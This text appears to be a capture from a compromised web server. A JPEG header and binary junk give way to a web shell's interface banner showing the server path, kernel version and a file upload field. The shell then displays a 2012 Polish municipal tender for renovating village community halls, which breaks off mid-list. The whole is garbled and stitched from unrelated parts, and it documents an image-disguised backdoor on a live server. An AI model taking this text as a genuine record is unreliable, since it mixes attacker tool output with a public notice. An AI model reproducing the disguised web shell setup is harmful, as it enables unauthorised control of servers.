JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120917/350324-N-2012.html

<p class="kh_header"><b>Dobrzyniewo Duże: Remonty świetlic wiejskich na terenie Gminy Dobrzyniewo Duże</b><br>
<b>Numer ogłoszenia: 350324 - 2012; data zamieszczenia: 17.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrzyniewo Duże , ul. Białostocka 25, 16-002 Dobrzyniewo Duże, woj. podlaskie, tel. 85 7428155, faks 85 7197147.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrzyniewo.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty świetlic wiejskich na terenie Gminy Dobrzyniewo Duże.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie remontu w trzech świetlic wiejskich i Gminnego Centrum Kultury w Dobrzyniewie Dużym. 
CZĘŚĆ I - Remont świetlicy wiejskiej w Krynicach, Krynice  16A, 16-002 Dobrzyniewo Duże, 
CZĘŚĆ II - Remont świetlicy wiejskiej w Kozińcach, Kozińce 9, 16-002 Dobrzyniewo Duże,
CZĘŚĆ III - Remont świetlicy wiejskiej w Jaworówce, Jaworówka 8A, 16-002 Dobrzyniewo Duże.
CZĘŚĆ IV - Remont Gminnego Centrum Kultury w Dobrzyniewie Dużym, ul. Lipowa 71, 16-002 Dobrzyniewo Duże
2.Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć oferty częściowe na jedną lub więcej części zamówienia.
3.Szczegółowy zakres zamówienia obejmuje:
4. CZĘŚĆ I - Świetlica wiejska w Krynicach
1. Sala
- Wycyklinowanie posadzki z deszczułek, lakierowanie 1x lakierem podkładowym i 2x lakierem poliuretanowym
2. Zaplecze kuchenne
- Remont ścian i sufitów ze szpachlowaniem i malowaniem farbą emulsyjną i ftalową
- Wycyklinowanie posadzki z deszczułek, lakierowanie 1x lakierem podkładowym i 2x lakierem poliuretanowym
- Wymiana zlewozmywaka i baterii zlewozmywakowej, przeróbka instalacji wodociągowej
- Wymiana posadzki z płytek terakotowych z wymiana podłoża w pomieszczeniu sanitarnym
- Wymiana opraw oświetleniowych z przeniesieniem włącznika światła z łącznika do środka
pomieszczenia 
3. Roboty zewnętrzne
- Ocieplenie elewacji w technologii lekko - mokrej
a) ścian nadziemia - styropian 15cm, wyprawa mineralna,
b) cokół - styropian 8cm, wyprawa mozaikowa
- Likwidacja drzwi i zadaszenia na zapleczu budynku
- Pokrycie daszku betonowego w szczycie budynku z obróbkami z blachy powlekanej
-Uzupełnienie opaski przy budynku z płytek chodnikowych
5.CZĘŚĆ II - Świetlica wiejska w Kozińcach
1. Pomieszczenia I piętra
- Wymiana stolarki okiennej z wymianą obróbek blacharskich zewnętrznych i uzupełnieniem ubytków tynków zewnętrznych przy ościeżnicach
- Wymiana stolarki drzwiowej
- Zamurowanie otworów drzwiowych
- Uzupełnieniem ubytków tynków zewnętrznych przy ościeżnicach
- Remont ścian i sufitów ze szpachlowaniem i malowaniem farbą emulsyjną i ftalową
- Wymiana posadzki PCV na posadzkę z paneli drewnopodobnych
- Wymiana instalacji centralnego ogrzewania
- Wymiana gniazd 230V i włącznika światła 
2. Pomieszczenia parteru
- Wydzielenie zaplecza kuchennego przez wykonanie lekkiej zabudowy z płyt gipsowo - kartonowych na konstrukcji stalowej i osadzeniem drzwi 90 pełnych i przemalowaniem ścian, sufitu w zakresie prowadzonych robót farbą emulsyjną, lamperia farbą ftalową.
6.CZĘŚĆ III - Świetlica wiejska w Jaworówce
1. Roboty wewnętrzne
- Likwidacja sceny
- Wyburzenie pieców kaflowych
- Uzupełnienie ścian i tynków
- Wydzielenie pomieszczenia sanitarnego z przystosowaniem do potrzeb osób niepełnosprawnych z lekkiej zabudowy z płyt gipsowo - kartonowych na konstrukcji stalowej i osadzeniem drzwi 90 pełnych i obłożeniem płytkami glazury na wysokość 2,0m
- Wymiana stolarki wewnętrznej
- Odmalowanie ścian i sufitów we wszystkich pomieszczeniach, z uprzednim szpachlowaniem, farbą emulsyjną, lamperie farbą ftalową
- Ułożenie płyty OSB 6mm na posadzce, ułożenie wytłumienia i wykonanie posadzki z paneli
podłogowych AC4 z oblistwowaniem
- Wymienić instalację elektryczną oświetleniową i gniazd wtykowych w całym obiekcie
- Wykonanie ogrzewania elektrycznego obiektu listwami grzejnymi
- Wykonanie instalacji wodno - kanalizacyjnej z wykonaniem wcinki do istniejącej instalacji
wodociągowej w piwnicy budynku i wyprowadzeniem kanalizacji sanitarnej na zewnątrz budynku
2. Roboty zewnętrzne
- Naprawa rynien i rur spustowych
- Przełożenie i uzupełnienie opaski budynku z płyt chodnikowych
- Wymurowanie kominów ponad dachem celem zapewnienia wentylacji pomieszczeń
- Wykonanie przyłącza kanalizacji sanitarnej do istniejącego szamba
7.CZĘŚĆ IV - Gminne Centrum Kultury w Dobrzyniewie Dużym
1. Roboty wewnętrzne
a) pomieszczenia biurowe i łazienka
- Wymienić instalację elektryczną oświetleniową i gniazd wtykowych
b) klatka schodowa + komunikacja I piętra
- Odmalowanie ścian i sufitów we wszystkich pomieszczeniach, z uprzednim szpachlowaniem, farbą emulsyjną, lamperie farbą ftalową
- Wymienić istniejącą posadzkę PCV na posadzkę z płytek gres z cokolikami
-Ułożyć płytki gres na schodach wraz z cokolikami
- Wymienić instalację elektryczną oświetleniową i gniazd wtykowych
2. Teren
a) Ogrodzenie
- Rozebranie istniejącego ogrodzenia i wyburzenie cokołu betonowego
- Wykonanie cokołu betonowego
- Zakres rzeczowy obejmuje również zakup i montaż słupków ogrodzeniowych o wymiarach 7cm/7cm z czapką w ilości 90 sztuk rozstawionych w fundamencie w odległości jeden od drugiego o 2,05 m. Słupek należy pomalować dwukrotnie farbą koloru czarnego. 64 słupki powinny zostać przystosowane do montażu na nich siatki ogrodzeniowej. Pozostałe 26 słupków powinny być gładkie bez jakichkolwiek naspawanych elementów. Wysokość słupka nad fundamentem - 1,50 m.- ta pozycja nie jest ujęta w przedmiarze.
b) Teren utwardzony
- Demontaż istniejącej nawierzchni z płyt betonowych
- Korytowanie i roboty ziemne
- Wykonanie podbudowy
- Ustawieni krawężników i obrzeży trawnikowych
- Ułożenie nawierzchni z kostki betonowej gr. 8cm
- Ułożenie chodnika z kostki betonowej gr. 6cm
c) Tereny zielone
- Rozrzucenie ziemi urodzajnej
- Wykonanie trawników dywanowych siewem
8.Szczegółowy zakres zadania określa:
1. Szczegółowa Specyfikacji Techniczna Wykonania i Odbioru Robót stanowiąca Załącznik nr 4 do SIWZ ( Część I, II, III i IV)
2.Istotne postanowienia umowy stanowiące Załączniki nr 5 do SIWZ) 
3.Przedmiarach robót stanowiących Załączniki nr CZĘŚĆ I - 6, CZĘŚĆ II  - 6A, CZĘŚĆ III - 6B, CZĘŚĆ IV - 6C do SIWZ)
9.Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 24 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
10.Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
11.Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia
12.Wykonawca ma obowiązek realizacji prac z zakresu termomodernizacji Świetlicy wiejskiej w Krynicach zgodnie z ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. Nr 92, poz. 880 z późn. zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.42.11.30-4, 45.44.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi w ofercie oświadczenie o spełnianiu warunków udziału w niniejszym postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do IDW.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi w ofercie oświadczenie o spełnianiu warunków udziału w niniejszym postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do IDW.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi w ofercie oświadczenie o spełnianiu warunków udziału w niniejszym postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do IDW.
.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi w ofercie oświadczenie o spełnianiu warunków udziału w niniejszym postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 2 do IDW.
.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/ Wypełniony Formularz Ofertowy [sporządzony według wzoru stanowiącego Załącznik nr 1 do SIWZ]; 
2/ stosowne Pełnomocnictwo(a) - w przypadku, gdy:
i. upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru
ii. Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, (dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian postanowień zawartej umowy:
1)w zakresie wynagrodzenia - gdy nastąpi zmiana stawki podatku od towarów i usług (VAT) w związku ze zmianą przepisów o podatku od towarów i usług - o kwotę będącą różnicą pomiędzy kwotą VAT po zmianie stawki tego podatku;
2)w zakresie terminu wykonania zamówienia, w przypadku:
a)braku dostępu do pomieszczeń lub obszarów, w których wykonywane są roboty objęte zamówieniem (przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni braku dostępu do pomieszczeń lub obszarów, w których wykonywane są roboty);
b)braku dostępu do mediów (np. awarie w dostawach energii elektrycznej, wody czy innych mediów niezbędnych do wykonania przedmiotu umowy) - przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni trwania awarii powodującej brak dostępu do mediów;
c)opóźnienia ze strony Zamawiającego przekazania Wykonawcy terenu budowy - przesunięcie terminu może nastąpić wyłącznie o czas równy ilości dni zwłoki, w jakiej pozostaje Zamawiający [od dnia powstania zwłoki do dnia protokolarnego przekazania terenu budowy];
d)z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa -wyłącznie o czas dokonywania zmian w projekcie, jeżeli nie jest w czasie wprowadzania zmian możliwe wykonywanie przedmiotu zamówienia,
e)z powodu wystąpienia zamówień lub robót dodatkowych, jeżeli nie jest możliwe wykonywanie zamówienia podstawowego równolegle do wykonywania zamówienia (robót) dodatkowych - wyłącznie o okres wykonywania zamówienia (robót) dodatkowego,
f)z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach, na czas jej działania uniemożliwiającego wykonywanie zamówienia,
g)z powodu działań osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy którejkolwiek ze stron - wyłącznie na okres uniemożliwienia Wykonawcy wykonywania zamówienia.

O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie.
Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.
Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.dobrzyniewoduze.wrotapodlasia.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędzie Gminy w Dobrzyniewie Dużym, ul. Białostocka 25, 16-002 Dobrzyniewo Duże pok. Nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2012 godzina 12:00, miejsce: Urzędz Gminy w Dobrzyniewie Dużym, ul. Białostocka 25, 16-002 Dobrzyniewo Duże pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków pozostających w dyspozycji ministra właściwego do spraw kultury i ochrony dziedzictwa narodowego w ramach programu Rozwój Infrastruktury Kultury/Infrastruktura Domów Kultury..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont świetlicy wiejskiej w Krynicach, Krynice  16A, 16-002 Dobrzyniewo Duże,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie Remontu świetlicy wiejskiej w Krynicach, Krynice  16A, 16-002 Dobrzyniewo Duże. 
2. Szczegółowy zakres zamówienia obejmuje:
Świetlica wiejska w Krynicach
1. Sala
- Wycyklinowanie posadzki z deszczułek, lakierowanie 1x lakierem podkładowym i 2x lakierem poliuretanowym
2. Zaplecze kuchenne
- Remont ścian i sufitów ze szpachlowaniem i malowaniem farbą emulsyjną i ftalową
- Wycyklinowanie posadzki z deszczułek, lakierowanie 1x lakierem podkładowym i 2x lakierem poliuretanowym
- Wymiana zlewozmywaka i baterii zlewozmywakowej, przeróbka instalacji wodociągowej
- Wymiana posadzki z płytek terakotowych z wymiana podłoża w pomieszczeniu sanitarnym
- Wymiana opraw oświetleniowych z przeniesieniem włącznika światła z łącznika do środka
pomieszczenia 
3. Roboty zewnętrzne
- Ocieplenie elewacji w technologii lekko - mokrej
a) ścian nadziemia - styropian 15cm, wyprawa mineralna,
b) cokół - styropian 8cm, wyprawa mozaikowa
- Likwidacja drzwi i zadaszenia na zapleczu budynku
- Pokrycie daszku betonowego w szczycie budynku z obróbkami z blachy powlekanej
-Uzupełnienie opaski przy budynku z płytek chodnikowych
Szczegółowy zakres zadania określa:
1.Szczegółowa Specyfikacji Techniczna Wykonania i Odbioru Robót stanowiąca Załącznik nr 4 do SIWZ
2.Istotne postanowienia umowy stanowiące Załączniki nr 5 do SIWZ) 
3.Przedmiarach robót stanowiących Załączniki nr CZĘŚĆ I - 6 do SIWZ)
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 24 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia
Wykonawca ma obowiązek realizacji prac z zakresu termomodernizacji Świetlicy wiejskiej w Krynicach zgodnie z ustawą z dnia 16 kwietnia 2004r. o ochronie przyrody (Dz. U. Nr 92, poz. 880 z późn. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.42.11.30-4, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont świetlicy wiejskiej w Kozińcach, Kozińce 9, 16-002 Dobrzyniewo Duże,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie remontu świetlicy wiejskiej w Kozińcach, Kozińce 9, 16-002 Dobrzyniewo Duże.
Świetlica wiejska w Kozińcach
1. Pomieszczenia I piętra
- Wymiana stolarki okiennej z wymianą obróbek blacharskich zewnętrznych i uzupełnieniem ubytków tynków zewnętrznych przy ościeżnicach
- Wymiana stolarki drzwiowej
- Zamurowanie otworów drzwiowych
- Uzupełnieniem ubytków tynków zewnętrznych przy ościeżnicach
- Remont ścian i sufitów ze szpachlowaniem i malowaniem farbą emulsyjną i ftalową
- Wymiana posadzki PCV na posadzkę z paneli drewnopodobnych
